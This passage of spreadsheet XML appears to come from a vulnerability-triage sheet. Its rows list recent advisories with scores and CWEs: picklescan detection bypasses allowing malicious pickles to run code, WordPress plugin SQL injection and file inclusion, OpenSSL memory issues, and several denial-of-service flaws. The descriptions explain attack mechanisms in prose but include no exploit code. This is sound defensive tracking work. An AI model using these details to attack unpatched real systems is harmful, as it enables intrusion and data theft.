          <t>pip:picklescan</t>
        </is>
      </c>
      <c r="M446" s="5" t="inlineStr">
        <is>
          <t>0.0.30</t>
        </is>
      </c>
      <c r="N446" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O446" s="5" t="inlineStr"/>
      <c r="P446" s="5" t="inlineStr"/>
      <c r="Q446" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R446" s="5" t="inlineStr">
        <is>
          <t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-9w88-8rmg-7g2p. This link is maintained to preserve external references.
### Original Description
picklescan before 0.0.30 fails to detect cProfile.runctx function calls in pickle file reduce methods, allowing attackers to execute arbitrary code. Malicious pickle files bypass picklescan detection and execute remote code when loaded via pickle.load().</t>
        </is>
      </c>
      <c r="S446" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-fcqg-3mwf-cfcf</t>
        </is>
      </c>
    </row>
    <row r="447">
      <c r="A447" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B447" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C447" s="5" t="inlineStr">
        <is>
          <t>GHSA-fh2f-24rh-r2vq</t>
        </is>
      </c>
      <c r="D447" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E447" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F447" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G447" s="5" t="inlineStr"/>
      <c r="H447" s="5" t="inlineStr"/>
      <c r="I447" s="5" t="inlineStr"/>
      <c r="J447" s="5" t="inlineStr"/>
      <c r="K447" s="5" t="inlineStr"/>
      <c r="L447" s="5" t="inlineStr">
        <is>
          <t>pip:picklescan</t>
        </is>
      </c>
      <c r="M447" s="5" t="inlineStr">
        <is>
          <t>0.0.25</t>
        </is>
      </c>
      <c r="N447" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O447" s="5" t="inlineStr"/>
      <c r="P447" s="5" t="inlineStr"/>
      <c r="Q447" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="R447" s="5" t="inlineStr">
        <is>
          <t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-v7x6-rv5q-mhwc. This link is maintained to preserve external references.
### Original Description
picklescan before 0.0.25 fails to detect malicious pickle files that use timeit.timeit() in the __reduce__ method, allowing remote code execution. Attackers can craft pickle files that import dangerous libraries like os and execute arbitrary system commands, which evade picklescan detection and execute when pickle.load() is called.</t>
        </is>
      </c>
      <c r="S447" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-fh2f-24rh-r2vq</t>
        </is>
      </c>
    </row>
    <row r="448">
      <c r="A448" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B448" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C448" s="5" t="inlineStr">
        <is>
          <t>GHSA-qvp4-q2p5-22gg</t>
        </is>
      </c>
      <c r="D448" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E448" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F448" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G448" s="5" t="inlineStr"/>
      <c r="H448" s="5" t="inlineStr"/>
      <c r="I448" s="5" t="inlineStr"/>
      <c r="J448" s="5" t="inlineStr"/>
      <c r="K448" s="5" t="inlineStr"/>
      <c r="L448" s="5" t="inlineStr">
        <is>
          <t>pip:picklescan</t>
        </is>
      </c>
      <c r="M448" s="5" t="inlineStr">
        <is>
          <t>0.0.28</t>
        </is>
      </c>
      <c r="N448" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O448" s="5" t="inlineStr"/>
      <c r="P448" s="5" t="inlineStr"/>
      <c r="Q448" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R448" s="5" t="inlineStr">
        <is>
          <t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-vv6j-3g6g-2pvj. This link is maintained to preserve external references.
### Original Description
picklescan before 0.0.28 fails to detect malicious pickle files that invoke torch.utils._config_module.load_config function within reduce methods. Attackers can craft pickle files embedding arbitrary code that evades detection but executes during pickle.load, enabling remote code execution in supply chain attacks.</t>
        </is>
      </c>
      <c r="S448" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-qvp4-q2p5-22gg</t>
        </is>
      </c>
    </row>
    <row r="449">
      <c r="A449" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B449" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C449" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14457</t>
        </is>
      </c>
      <c r="D449" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E449" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F449" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G449" s="5" t="inlineStr"/>
      <c r="H449" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I449" s="5" t="inlineStr"/>
      <c r="J449" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K449" s="5" t="inlineStr">
        <is>
          <t>openssl:openssl</t>
        </is>
      </c>
      <c r="L449" s="5" t="inlineStr"/>
      <c r="M449" s="5" t="inlineStr"/>
      <c r="N449" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O449" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P449" s="5" t="inlineStr"/>
      <c r="Q449" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R449" s="5" t="inlineStr">
        <is>
          <t>Issue summary: In a server or client configuration with RFC7250 Raw Public Keys (RPKs)
enabled, and only the private key (with no associated certificate) configured locally,
a NULL pointer dereference may occur when the remote peer solicits raw public keys and
also sends the typically omitted "signature_algorithms_cert" TLS extension.
Impact summary: The impact is limited to a possible Denial of Service as a result of
an application abort, no data disclosure or remote command execution are possible.
CWE: CWE-476: NULL Pointer Dereference
Description: While a passing comment in sample code in the documentation suggests
that key-only RPK configurations are supported, the best-practice RPK configuration
is to always configure a corresponding certificate (possibly self-signed or
signed by any convenient CA).
When the private key is configured along with a matching certificate, the
"signature_algorithms_cert" extension is handled reliably even without the
fix, and peer clients or servers that don't support raw public keys may be
able to complete a TLS connection by pinning or verifying the corresponding
certificate or its public key.
Deployments that prefer to configure just a private key with no certificate
need to upgrade to an updated release as noted below.
FIPS impact: no
No FIPS modules are affected by this issue, as the SSL protocol implementation
is outside the OpenSSL FIPS module boundary.</t>
        </is>
      </c>
      <c r="S449" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14457</t>
        </is>
      </c>
    </row>
    <row r="450">
      <c r="A450" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B450" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C450" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15406</t>
        </is>
      </c>
      <c r="D450" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E450" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F450" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G450" s="5" t="inlineStr"/>
      <c r="H450" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I450" s="5" t="inlineStr"/>
      <c r="J450" s="5" t="inlineStr"/>
      <c r="K450" s="5" t="inlineStr"/>
      <c r="L450" s="5" t="inlineStr"/>
      <c r="M450" s="5" t="inlineStr"/>
      <c r="N450" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O450" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P450" s="5" t="inlineStr"/>
      <c r="Q450" s="5" t="inlineStr">
        <is>
          <t>CWE-98</t>
        </is>
      </c>
      <c r="R450" s="5" t="inlineStr">
        <is>
          <t>The Eventin – Event Calendar, Event Registration, Tickets &amp; Booking (AI Powered) plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.1.22 via the 'event_layout' parameter parameter. This makes it possible for authenticated attackers, with custom-level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S450" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15406</t>
        </is>
      </c>
    </row>
    <row r="451">
      <c r="A451" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B451" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C451" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15462</t>
        </is>
      </c>
      <c r="D451" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E451" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F451" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G451" s="5" t="inlineStr"/>
      <c r="H451" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I451" s="5" t="inlineStr"/>
      <c r="J451" s="5" t="inlineStr"/>
      <c r="K451" s="5" t="inlineStr"/>
      <c r="L451" s="5" t="inlineStr"/>
      <c r="M451" s="5" t="inlineStr"/>
      <c r="N451" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O451" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P451" s="5" t="inlineStr"/>
      <c r="Q451" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R451" s="5" t="inlineStr">
        <is>
          <t>The Sticky Chat Widget plugin for WordPress is vulnerable to SQL Injection via the 'scw_form_fields' parameter array keys of the 'scw_save_form_data' AJAX action in versions up to, and including, 1.4.2. This is due to the save_form_data() function passing attacker-controlled POST array keys unsanitized to $wpdb-&gt;insert(), which wraps column identifiers in backticks without escaping them, allowing a backtick in an attacker-supplied key to break out of the column-identifier list into raw SQL; additionally, the use of filter_input() bypasses WordPress's wp_magic_quotes() protection, and the widget_id validation loop is skipped entirely when no valid widget_id is supplied, leaving $isValid at 1. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.</t>
        </is>
      </c>
      <c r="S451" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15462</t>
        </is>
      </c>
    </row>
    <row r="452">
      <c r="A452" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B452" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C452" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18561</t>
        </is>
      </c>
      <c r="D452" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E452" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F452" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G452" s="5" t="inlineStr"/>
      <c r="H452" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I452" s="5" t="inlineStr"/>
      <c r="J452" s="5" t="inlineStr"/>
      <c r="K452" s="5" t="inlineStr"/>
      <c r="L452" s="5" t="inlineStr"/>
      <c r="M452" s="5" t="inlineStr"/>
      <c r="N452" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O452" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P452" s="5" t="inlineStr"/>
      <c r="Q452" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R452" s="5" t="inlineStr">
        <is>
          <t>The Unlimited Elements For Elementor plugin for WordPress is vulnerable to SQL Injection via the 'addontype' parameter in versions up to, and including, 2.0.16. This is due to insufficient escaping on the user-supplied parameter and the lack of sufficient preparation on the existing SQL query in the getWhereString() function; when the parameter is supplied as an array, element zero is used verbatim as the SQL comparison operator and concatenated into the WHERE clause without sanitization, while normalizeAjaxInputData() strips WordPress's magic_quotes protection from the value. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.</t>
        </is>
      </c>
      <c r="S452" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18561</t>
        </is>
      </c>
    </row>
    <row r="453">
      <c r="A453" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B453" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C453" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44914</t>
        </is>
      </c>
      <c r="D453" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E453" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F453" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G453" s="5" t="inlineStr"/>
      <c r="H453" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I453" s="5" t="inlineStr"/>
      <c r="J453" s="5" t="inlineStr"/>
      <c r="K453" s="5" t="inlineStr"/>
      <c r="L453" s="5" t="inlineStr">
        <is>
          <t>maven:org.apache.nifi:nifi-web-api</t>
        </is>
      </c>
      <c r="M453" s="5" t="inlineStr">
        <is>
          <t>2.9.0</t>
        </is>
      </c>
      <c r="N453" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O453" s="5" t="inlineStr"/>
      <c r="P453" s="5" t="inlineStr"/>
      <c r="Q453" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R453" s="5" t="inlineStr">
        <is>
          <t>Apache NiFi 1.12.0 through 2.9.0 are missing authorization when replacing Process Groups that include extension components with specific Required Permissions based on the Restricted annotation. The Restricted annotation indicates additional privileges required, but framework authorization did not check restricted status when handling requests to replace Process Groups. The missing authorization permits a user with general write access to add components with Restricted status. Apache NiFi installations that do not implement specific authorization for Restricted components are not subject to this vulnerability because the framework enforces write permissions as the security boundary. Upgrading to Apache NiFi 2.9.0 is the recommended mitigation, which removes the implementation of Restricted status authorization from the framework.</t>
        </is>
      </c>
      <c r="S453" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44914</t>
        </is>
      </c>
    </row>
    <row r="454">
      <c r="A454" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B454" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C454" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49846</t>
        </is>
      </c>
      <c r="D454" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E454" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F454" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G454" s="5" t="inlineStr"/>
      <c r="H454" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I454" s="5" t="inlineStr"/>
      <c r="J454" s="5" t="inlineStr"/>
      <c r="K454" s="5" t="inlineStr"/>
      <c r="L454" s="5" t="inlineStr"/>
      <c r="M454" s="5" t="inlineStr"/>
      <c r="N454" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O454" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P454" s="5" t="inlineStr"/>
      <c r="Q454" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-697</t>
        </is>
      </c>
      <c r="R454" s="5" t="inlineStr">
        <is>
          <t>libks provides foundational support for signalwire C products. Prior to version 2.0.11, `clean_uri()` in libks's HTTP request parser fails to reject URIs whose path has more segments than its internal canonicalization buffer can hold. The canonicalization step silently passes such URIs through with embedded ".." sequences intact, enabling path traversal in any consumer that later joins the URI with a filesystem path. Version 2.0.11 patches the issue.</t>
        </is>
      </c>
      <c r="S454" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49846</t>
        </is>
      </c>
    </row>
    <row r="455">
      <c r="A455" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B455" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C455" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50013</t>
        </is>
      </c>
      <c r="D455" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E455" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F455" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G455" s="5" t="inlineStr"/>
      <c r="H455" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I455" s="5" t="inlineStr"/>
      <c r="J455" s="5" t="inlineStr"/>
      <c r="K455" s="5" t="inlineStr"/>
      <c r="L455" s="5" t="inlineStr"/>
      <c r="M455" s="5" t="inlineStr"/>
      <c r="N455" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O455" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P455" s="5" t="inlineStr"/>
      <c r="Q455" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-820</t>
        </is>
      </c>
      <c r="R455" s="5" t="inlineStr">
        <is>
          <t>Hoverfly is an open source API simulation tool. Prior to version 1.12.8, when Hoverfly is running in Diff mode, the `AddDiff()` function writes to the shared `responsesDiff` map without any synchronization (no mutex). When multiple proxy requests are processed concurrently (the normal case for any proxy), the concurrent map writes trigger Go's built-in race detector which causes a `fatal error: concurrent map read and map write`, immediately killing the entire Hoverfly process. This is trivially exploitable by sending multiple simultaneous requests. Version 1.12.8 patches the issue.</t>
        </is>
      </c>
      <c r="S455" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50013</t>
        </is>
      </c>
    </row>
    <row r="456">
      <c r="A456" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B456" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C456" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54135</t>
        </is>
      </c>
      <c r="D456" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E456" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F456" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G456" s="5" t="inlineStr"/>
      <c r="H456" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I456" s="5" t="inlineStr"/>
      <c r="J456" s="5" t="inlineStr"/>
      <c r="K456" s="5" t="inlineStr"/>
      <c r="L456" s="5" t="inlineStr"/>
      <c r="M456" s="5" t="inlineStr"/>
      <c r="N456" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O456" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P456" s="5" t="inlineStr"/>
      <c r="Q456" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="R456" s="5" t="inlineStr">
        <is>
          <t>AirSane is a SANE frontend, and a scanner server that supports Apple's AirScan protocol. Versions prior to 0.4.12 have a vulnerability in the custom HTTP server implementation of AirSane that allows a remote unauthenticated attacker to cause a Denial of Service (DoS) via memory exhaustion (OOM). In httpserver.cpp, the HttpServer::Request::content function reads the Content-Length header and directly passes this value to std::string::resize() without any upper-bound validation or safe parsing. An attacker can send an HTTP POST request with an artificially large Content-Length value. This forces the daemon to attempt allocating gigabytes of memory, resulting in a std::bad_alloc exception and immediately crashing the AirSane process. Additionally, providing non-numeric characters in the Content-Length header leads to undefined behavior (NaN to integer conversion) due to the lack of error handling during header parsing. Version 0.4.12 patches the issue.</t>
        </is>
      </c>
      <c r="S456" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54135</t>
        </is>
      </c>
    </row>
    <row r="457">
      <c r="A457" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B457" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C457" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54874</t>
        </is>
      </c>
      <c r="D457" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E457" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F457" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G457" s="5" t="inlineStr"/>
      <c r="H457" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I457" s="5" t="inlineStr"/>
      <c r="J457" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K457" s="5" t="inlineStr">
        <is>
          <t>openssl:openssl</t>
        </is>
      </c>
      <c r="L457" s="5" t="inlineStr"/>
      <c r="M457" s="5" t="inlineStr"/>
      <c r="N457" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O457" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P457" s="5" t="inlineStr"/>
      <c r="Q457" s="5" t="inlineStr">
        <is>
          <t>CWE-405</t>
        </is>
      </c>
      <c r="R457" s="5" t="inlineStr">
        <is>
          <t>Issue summary: Receiving a DTLS record for a future epoch while a handshake
is in progress causes OpenSSL to buffer far more memory than the record
itself requires.
Impact summary: A peer can use a small amount of network traffic to make an
OpenSSL DTLS endpoint retain a disproportionately large amount of memory,
which may lead to a Denial of Service.
CWE: CWE-405: Asymmetric Resource Consumption (Amplification)
Description: While a DTLS handshake is in progress, a peer may legitimately
have already moved on to the next epoch (for example, having sent its
ChangeCipherSpec and Finished messages) before the local endpoint has
processed the same transition, typically because of reordering on the
underlying UDP transport. OpenSSL buffers such early records so that they
can be processed once the local endpoint catches up.
Buffering a record currently retains the entire read buffer it arrived in,
which is sized to hold the largest possible DTLS record (around 16
kilobytes), rather than just the bytes that make up the record itself. Up
to 100 such records may be buffered per connection. As a result, a peer
that sends a stream of small forged records claiming to belong to the next
epoch can cause an OpenSSL DTLS endpoint to retain around 1.7 megabytes of
memory, despite sending only a small fraction of that amount of data over
the network.
An attacker therefore gains a memory amplification factor of around 1200,
and can multiply the effect across as many associations as it is able to
open, making this a remote memory exhaustion Denial of Service risk for
DTLS servers. Since the memory retained per connection remains bounded,
and any limit an application already places on the number of concurrent
associations also bounds the total exposure, this issue has been assessed
as Low severity.
FIPS impact: no
No FIPS modules are affected by this issue as the affected code is outside
the OpenSSL FIPS module boundary.
OpenSSL 4.0, 3.6, 3.5, 3.4, 3.0, 1.1.1 and 1.0.2 are vulnerable to this
issue.
OpenSSL 4.0 users should upgrade to OpenSSL 4.0.2.
OpenSSL 3.6 users should upgrade to OpenSSL 3.6.4.
OpenSSL 3.5 users should upgrade to OpenSSL 3.5.8.
OpenSSL 3.4 users should upgrade to OpenSSL 3.4.7.
OpenSSL 3.0 users should upgrade to OpenSSL 3.0.22.
Premium support customers only:
OpenSSL 1.1.1 users should upgrade to OpenSSL 1.1.1zi
OpenSSL 1.0.2 users should upgrade to OpenSSL 1.0.2zr
This issue was reported on 18 May 2026 by Amazon Web Services.
The fix has been developed by Matt Caswell.
-- cut (non-publishing metadata for internal use) --
Reported by: Amazon Web Services
Fixed by: Matt Caswell</t>
        </is>
      </c>
      <c r="S457" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54874</t>
        </is>
      </c>
    </row>
    <row r="458">
      <c r="A458" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B458" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C458" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57159</t>
        </is>
      </c>
      <c r="D458" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E458" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F458" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G458" s="5" t="inlineStr"/>
      <c r="H458" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I458" s="5" t="inlineStr"/>
      <c r="J458" s="5" t="inlineStr"/>
      <c r="K458" s="5" t="inlineStr">
        <is>
          <t>teluu:pjsip</t>
        </is>
      </c>
      <c r="L458" s="5" t="inlineStr"/>
      <c r="M458" s="5" t="inlineStr"/>
      <c r="N458" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O458" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P458" s="5" t="inlineStr"/>
      <c r="Q458" s="5" t="inlineStr">
        <is>
          <t>CWE-129, CWE-787</t>
        </is>
      </c>
      <c r="R458" s="5" t="inlineStr">
        <is>
          <t>PJSIP is a free and open source multimedia communication library written in C. Prior to commit 673b978, a remote out-of-bounds read and write can occur in the SDP negotiator when the remote payload-type map maintenance feature is enabled. assign_pt_and_update_map() in pjmedia/src/pjmedia/sdp_neg.c uses payload-type numbers taken from a remote SDP offer or answer to index fixed-size internal tables without sufficient bounds validation, so a crafted remote SDP can cause memory access outside those tables. The practical impact is memory corruption and denial of service; code execution is not demonstrated. This path is only reached when PJMEDIA_SDP_NEG_MAINTAIN_REMOTE_PT_MAP is enabled. The default is disabled, so default builds are not affected; the feature is an interoperability option that integrating products may enable. This issue has been patched via commit 673b978.</t>
        </is>
      </c>
      <c r="S458" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57159</t>
        </is>
      </c>
    </row>
    <row r="459">
      <c r="A459" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B459" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C459" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63072</t>
        </is>
      </c>
      <c r="D459" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E459" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F459" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G459" s="5" t="inlineStr"/>
      <c r="H459" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I459" s="5" t="inlineStr"/>
      <c r="J459" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K459" s="5" t="inlineStr">
        <is>
          <t>openssl:openssl</t>
        </is>
      </c>
      <c r="L459" s="5" t="inlineStr"/>
      <c r="M459" s="5" t="inlineStr"/>
      <c r="N459" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O459" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P459" s="5" t="inlineStr"/>
      <c r="Q459" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R459" s="5" t="inlineStr">
        <is>
          <t>Issue summary: OpenSSL CMS decryption sizes the key-unwrap output buffer based
on querying the unwrapped key size, but the AES-WRAP-PAD unwrap primitive
can write and cleanse more bytes than that query reports, causing an 8-byte
out-of-bounds heap write.
Impact summary: An attacker who supplies a crafted CMS message can trigger a
deterministic 8-byte out-of-bounds heap write when the victim decrypts it
with CMS_decrypt(), corrupting the heap and typically resulting in a Denial
of Service.
CWE: CWE-787: Out-of-bounds Write
Description: The key-wrap OID is potentially attacker-controlled on the wire.
CMS unwrapping allows both id-aesNNN-wrap-pad and id-aesNNN-wrap ciphers.
An attacker can take a legitimate message and change a single OID byte to
select the padded variant while leaving the message otherwise valid. Since
the unwrap key is derived from the recipient's private operation (ECDH key
agreement or ML-KEM decapsulation), the RFC 5649 integrity check cannot
pass, and the decryption fails with integrity failure.
The write is a fixed-size (8-byte), fixed-value (zero) heap overflow
immediately past the allocation, requires no special configuration, and is
reachable from the public CMS_decrypt() function. The consequence is
a heap corruption leading to a Denial of Service. The fix in the CMS code
sizes the unwrap output buffer for the worst case so a failed unwrap cannot
write past the allocation.
FIPS impact: no
As the CMS code lives outside the FIPS module boundary, no FIPS
modules are affected by this CVE.</t>
        </is>
      </c>
      <c r="S459" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63072</t>
        </is>
      </c>
    </row>
    <row r="460">
      <c r="A460" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
